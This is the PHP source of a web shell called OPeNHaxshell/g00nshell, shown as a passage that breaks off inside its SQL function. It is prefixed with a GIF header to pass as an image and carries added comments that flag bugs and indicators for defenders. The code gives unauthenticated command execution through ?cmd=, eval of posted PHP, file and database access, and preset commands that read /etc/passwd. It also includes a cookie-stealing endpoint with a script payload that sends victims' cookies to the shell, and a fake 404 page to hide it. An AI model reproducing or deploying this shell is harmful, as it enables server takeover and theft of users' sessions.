
1 GIF89;a

2 666
3 <?php
4 /*
5
6 ###
7 ###
8 ###
9 ###
10 ###
11 ###
12 ###
13 ###
14 ###
15 ###
16 ###
17 ###
18 ###
19 ###
20 ###
21 ###
22 ###
23 ###
24 ###
25 ###
26 ###
27 ###
28 ###
29 ###
30 ###
31 ###
32 ###
33 ###
34 ###
35 ###
36 ###
37 ###
38 ###
39 ###
40 ###
41 # [OPeNHax]Tn presents: #
42 # OPeNHaxshell v1.3 final #
43
44 ###
45 ###
46 ###
47 ###
48 ###
49 ###
50 ###
51 ###
52 ###
53 ###
54 ###
55 ###
56 ###
57 ###DOCUMENTATION
58 ###
59 ###
60 ###
61 ###
62 ###
63 ###
64 ###
65 ###
66 ###
67 ###
68 ###
69 ###
70 ###
71 ####
72 #To execute commands, simply include ?cmd=___ in the url. #
73 #Ex: http://site.com/shl.php?cmd=whoami #
74 # #
75 #To steal cookies, use ?cookie=___ in the url. #
76 #Ex: <script>document.location.href= #
77 #'http://site.com/shl.php?cookie='+document.cookies</script> #
78
79 ###
80 ###
81 ###
82 ###
83 ###
84 ###
85 ###
86 ###
87 ###
88 ###
89 ###
90 ###
91 ###VERIFICATION LEVELS
92 ###
93 ###
94 ###
95 ###
96 ###
97 ###
98 ###
99 ###
100 ###
101 ###
102 ###
103 ####
104 #0: No protection; anyone can access #
105 #1: User-Agent required #
106 #2: Require IP #
107 #3: Basic Authentication #
108
109 ###
110 ###
111 ###
112 ###
113 ###
114 ###
115 ###
116 ###
117 ###
118 ###
119 ###
120 ###
121 ###
122 ###
123 ###KNOWN BUGS
124 ###
125 ###
126 ###
127 ###
128 ###
129 ###
130 ###
131 ###
132 ###
133 ###
134 ###
135 ###
136 ###
137 ###
138 ###
139 #Windows directory handling #
140 # #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now #
143 #don't complain to me about it #
144
145 ###
146 ###
147 ###
148 ###
149 ###
150 ###
151 ###
152 ###
153 ###
154 ###
155 ###
156 ###
157 ###
158 ###
159 ###
160 ###SHOUTS
161 ###
162 ###
163 ###
164 ###
165 ###
166 ###
167 ###
168 ###
169 ###
170 ###
171 ###
172 ###
173 ###
174 ###
175 ###
176 ###
177 #pr0be - Beta testing & CSS #
178 #TrinTiTTY - Beta testing #
179 #clorox - Beta testing #
180 #Everyone else at g00ns.net #
181
182 ###
183 ###
184 ###
185 ###
186 ###
187 ###
188 ###
189 ###
190 ###
191 ###
192 ###
193 ###NOTE TO ADMINISTRATORS
194 ###
195 ###
196 ###
197 ###
198 ###
199 ###
200 ###
201 ###
202 ###
203 ###
204 ###
205 ###
206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs. #
208
209 ###
210 ###
211 ###
212 ###
213 ###
214 ###
215 ###
216 ###
217 ###
218 ###
219 ###
220 ###
221 ###
222 ###
223 ###
224 ###
225 ###
226 ###
227 ###
228 ###
229 ###
230 ###
231 ###
232 ###
233 ###
234 ###
235 ###
236 ###
237 ###
238 ###
239 ###
240 ###
241 ###
242 ###
243 ###
244 */
245 // Configuration
// NOTE(review): defender annotations only; the code is unchanged. $auth selects
// which gate the switch at the bottom of this run applies. 0 means the switch
// does nothing, so this copy is deployed with no access control at all.
246 $auth = 0;
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
// $email is blank, so the ?cookie= branch in the dispatcher calls mail() with an
// empty recipient and From: -- the exfiltration path is unconfigured here.
249 $email = ""; // E-mail address where cookies will be sent
250 $user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
252 // Global Variables
253 $version = "1.3 final";
// PHP_SELF is later interpolated unescaped into the HTML emitted by hide().
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
// split() was removed in PHP 7.0; on PHP 7+ this is a fatal call to an
// undefined function, so a working instance of this exact file implies PHP 5.
256 $servinf = split("[:]", getenv('HTTP_HOST'));
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
// Executes before the authentication switch: every request to this file spawns
// a `whoami` child of the web-server process, a useful process-tree indicator.
260 $curuser = @exec('whoami');
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd']; // duplicate of the assignment two lines up
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
266 $curdir = cleandir(getcwd());
// $dir has not been assigned at this point, so only the first branch can run;
// the two elseif conditions are identical and both are dead. They also read
// $_SESSION before session_start() is called a few lines below.
267 if(!$dir){$dir = $_GET['dir'];}
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
// Access gate. Level 1: loose != on md5(User-Agent). Level 2: in_array() on
// REMOTE_ADDR without strict comparison. Level 3: only checks that a Basic-auth
// user name was supplied; the hash comparison itself lives in userauth().
276 switch($auth){ // Authentication switcher
277 case 0: break;
278 case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();}
break;
279 case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280 case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
281 }
282
283 function userauth(){ // Basic authentication function
// Level-3 gate. The second operand is mis-parenthesised: md5() wraps the whole
// comparison, so it hashes a boolean and always returns a non-empty (truthy)
// string. The || is therefore always true and hide() runs on every request --
// as written, level 3 admits nobody. Only the WWW-Authenticate header is sent,
// no 401 status. hide() already calls die(), so the die() after it is dead.
284 global $user, $pass;
285 header("WWW-Authenticate: Basic realm='Secure Area'");
286 if(md5($_SERVER["PHP_AUTH_USER"]) != $user ||
md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287 hide();
288 die();
289 }
290 }
// Request dispatcher; runs after the $auth switch above. A bare ?cmd= with no
// act goes straight to exec(), so with $auth = 0 this is unauthenticated RCE.
// The switch below has a duplicate case "sql" (the second one is dead) and no
// case for the 'bshell' link that main() advertises, which hits default.
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
292 elseif(!$act && $cmd){
293 style();
294 echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
// exec() returns only the last output line into $cmd; $result holds all lines.
295 $cmd = exec($cmd, $result);
296 foreach($result as $line){echo($line . "\n");}
297 echo("</textarea>");
298 }
// Cookie receiver: mails the ?cookie= value to $email (blank in this config)
// and then serves the fake 404. Requests to this file carrying a ?cookie=
// query are the log indicator; the mail() call is silenced with @.
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email");
hide();} // Cookie stealer function
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
303 elseif($dir){files($dir);}
304 else{
305 switch($act){
306 case "phpinfo": phpinfo();break;
307 case "sql": sql();break;
308 case "files": files($dir);break;
309 case "email": email();break;
310 case "cmd": cmd();break;
311 case "upload": upload();break;
312 case "tools": tools();break;
313 case "sqllogin": sqllogin();break;
314 case "sql": sql();break; // unreachable: duplicate of the earlier "sql" case
315 case "lookup": lookup();break;
316 case "kill": kill();break;
317 case "phpexec": execphp();break;
318 default: main();break;
319 }
320 }
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
// Canonicalises a path and converts backslashes to forward slashes. realpath()
// returns false for a path that does not exist; str_replace treats that false
// as an empty string, so a missing path yields "". The first replacement turns
// a doubled backslash into "//" rather than "/", which is probably the
// "Windows directory handling" bug the header admits to -- not verified here.
322 $d = realpath($d);
323 $d = str_replace("\\\\", "//", $d);
324 $d = str_replace("////", "//", $d);
325 $d = str_replace("\\", "/", $d);
326 return($d);
327 }
328 function hide(){ // Hiding function
// Fake "404 Not Found" page imitating Apache's ErrorDocument text. No header()
// call sets the status, so the response goes out as HTTP 200 with a 404 body --
// a status/body mismatch worth hunting for in proxy and web-server logs. $self
// (PHP_SELF) is echoed into the body unescaped. die() ends the request here.
329 global $self, $soft, $servip, $servport;
330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the
request.
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
342 function style(){ // Style / header function
// Emits the <html><head> block with a <title> of "g00nshell v<version> - <host>"
// and the inline stylesheet. The fixed title text and the stylesheet rules are
// static strings and serve as a content signature for this shell family. No
// <body> or closing tags are printed; callers append straight after this.
343 global $servip,$version;
344 echo("<html>\n
345 <head>\n
346 <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347 <style>\n
348 body { background-color:#000000; color:white; font-family:Verdana; font-
size:11px; }\n
349 h1 { color:white; font-family:Verdana; font-size:11px; }\n
350 h3 { color:white; font-family:Verdana; font-size:11px; }\n
351 input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px
solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352 textarea { font-family:Courier; font-size:11px; }\n
353 a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-
size:11px; }\n
354 a:hover { color:#7F7F7F; }\n
355 td,th { font-size:12px; vertical-align:middle; }\n
356 th { font-size:13px; }\n
357 table { empty-cells:show;}\n
358 .inf { color:#7F7F7F; }\n
359 </style>\n
360 </head>\n");
361 }
362 function main(){ // Main/menu function
// Landing page: prints a host-reconnaissance summary (server software, uname,
// cwd, whoami, a fresh exec('id'), safe_mode, open_basedir, disable_functions,
// presence of mysql_connect) plus the action menu, then die()s. $banner is
// declared global but never used. function_exists(mysql_connect) passes a bare
// constant, which is a fatal Error on PHP 8. $_SERVER['QUERY_STRING'] is echoed
// raw into the link hrefs (reflected input). The 'bshell' menu entry has no
// matching case in the dispatcher.
363 global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
364 style();
365 $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP
info', 'phpexec'=>'PHP Execute',
366 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get
Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
367 $capt = array_flip($act);
368 echo("<form method='GET' name='shell'>");
369 echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370 echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371 echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372 echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373 echo("<div style='display:none' id='info'>");
374 echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
// Second process spawn per page view (the first is the top-level whoami).
375 echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376 if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font
color='red'>ON</font>");}
377 else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378 echo("\n<br>\n");
379 if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font
color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380 else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381 echo("\n<br>\n");
382 if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " .
@ini_get('disable_functions'));}
383 else{echo("<b>Disabled functions:</b> None");}
384 echo("\n<br>\n");
385 if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font
color='green'>ON</font>");}
386 else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387 echo("</div>");
388 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'block';\">More</a> ] ");
389 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'none';\">Less</a> ]");
390 echo("<center>");
391 echo("<h3 align='center'>Links</h3>");
392 if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a
href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
393 else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
394 echo("</center>");
395 echo("<hr>");
396 echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?
act=files'></iframe>");
397 echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version .
"</font> ::</pre>");
398 die();
399 }
400 function cmd(){ // Command execution function
// Interactive command page: renders a form with a free-text field and a preset
// drop-down, then exec()s whichever of POST 'cmd' / 'precmd' is non-empty and
// die()s if neither was submitted. array_flip turns the preset labels into
// option text, so two presets sharing a command string would collide. Output
// lines are written into the textarea without HTML escaping.
401 style();
402 echo("<form name='CMD' method='POST'>");
403 echo("<b>Command:</b><br>");
404 echo("<input name='cmd' type='text' size='50'> ");
405 echo("<select name='precmd'>");
406 $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open
ports'=>'netstat -an',
407 'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408 'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M
count=1024',
409 'Find passwd files'=>'find / -type f -name passwd');
410 $capt = array_flip($precmd);
411 foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412 echo("</select><br>\n");
413 echo("<input type='submit' value='Execute'>\n");
414 echo("</form>\n");
415 if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416 elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417 else{die();}
418 echo("Results: <br><textarea rows=20 cols=100>");
// Only the last output line lands in $cmd; $result carries the full output.
419 $cmd = @exec($x, $result);
420 foreach($result as $line){echo($line . "\n");}
421 echo("</textarea>");
422 }
423 function execphp(){ // PHP code execution function
// Arbitrary PHP execution: eval() of POST 'phpexec' after stripslashes() --
// presumably a magic_quotes-era assumption that quotes arrive escaped; not
// verifiable here. The submitted code is echoed back through htmlentities()
// into the form, while eval output goes straight into a textarea. There is no
// exit, so control returns to the dispatcher afterwards.
424 style();
425 echo("<h4>Execute PHP Code</h4>");
426 echo("<form method='POST'>");
427 echo("<textarea name='phpexec' rows=5 cols=100>");
428 if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429 echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430 echo("<input type='submit' value='Execute'>");
431 echo("</form>");
432 if($_POST['phpexec']){
433 echo("<textarea rows=10 cols=100>");
434 eval(stripslashes($_POST['phpexec']));
435 echo("</textarea>");
436 }
437 }
438 function sqllogin(){ // MySQL login function
// MySQL credential form. session_start() is called again although the
// top-level code already started the session. The Location header is sent
// without an exit, so the form is still rendered beneath it and die() only
// comes at the end. The password field is a plain type='text' input; the
// values are posted to ?act=sql, which stores them in $_SESSION.
439 session_start();
440 if($_SESSION['isloggedin'] == "true"){
441 header("Location: ?act=sql");
442 }
443 style();
444 echo("<form method='post' action='?act=sql'>");
445 echo("User:<br><input type='text' name='un' size='30'><br>\n");
446 echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447 echo("Host:<br><input type='text' name='host' size='30'
value='localhost'><br>\n");
448 echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449 echo("<input type='submit' value='Login'>");
450 echo("</form>");
451 die();
452 }
453 function sql(){ // General SQL Function
454 session_start();
455 if(!$_GET['sqlf']){style();}
456 if($_POST['un'] && $_POST['pw']){;
457 $_SESSION['sql_user'] = $_POST['un'];
458 $_SESSION['sql_password'] = $_POST['pw'];
459 }
460 if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461 else{$_SESSION['sql_host'] = 'localhost';}
462 if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463 else{$_SESSION['sql_port'] = '3306';}
464 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' .
$_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466 unset($_SESSION['sql_user'], $_SESSION['sql_password'],
$_SESSION['sql_host'], $_SESSION['sql_port']);
467 echo("Invalid credentials<br>\n");
468 die(sqllogin());
469 }
470 else{
471 $_SESSION['isloggedin'] = "true";
472 }
473 }
474 else{
475 die(sqllogin());
476 }
477 if ($_GET['db']){
478 mysql_select_db($_GET['db'], $sqlcon);
479 if($_GET['sqlquery']){
480 $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481 $num = mysql_num_rows($dat);
482 for($i=0;$i<$num;$i++){
483 echo(mysql_result($dat, $i) . "<br>\n");
484 }
485 }
486 else if($_GET['table'] && !$_GET['sqlf']){
487 echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] .
"&sqlf=ins'>Insert Row</a><br><br>\n");
488 echo("<table border='1'>");
489 $query = "SHOW COLUMNS FROM " . $_GET['table'];
490 $result = mysql_query($query, $sqlcon) or die(mysql_error());
491 $i = 0;
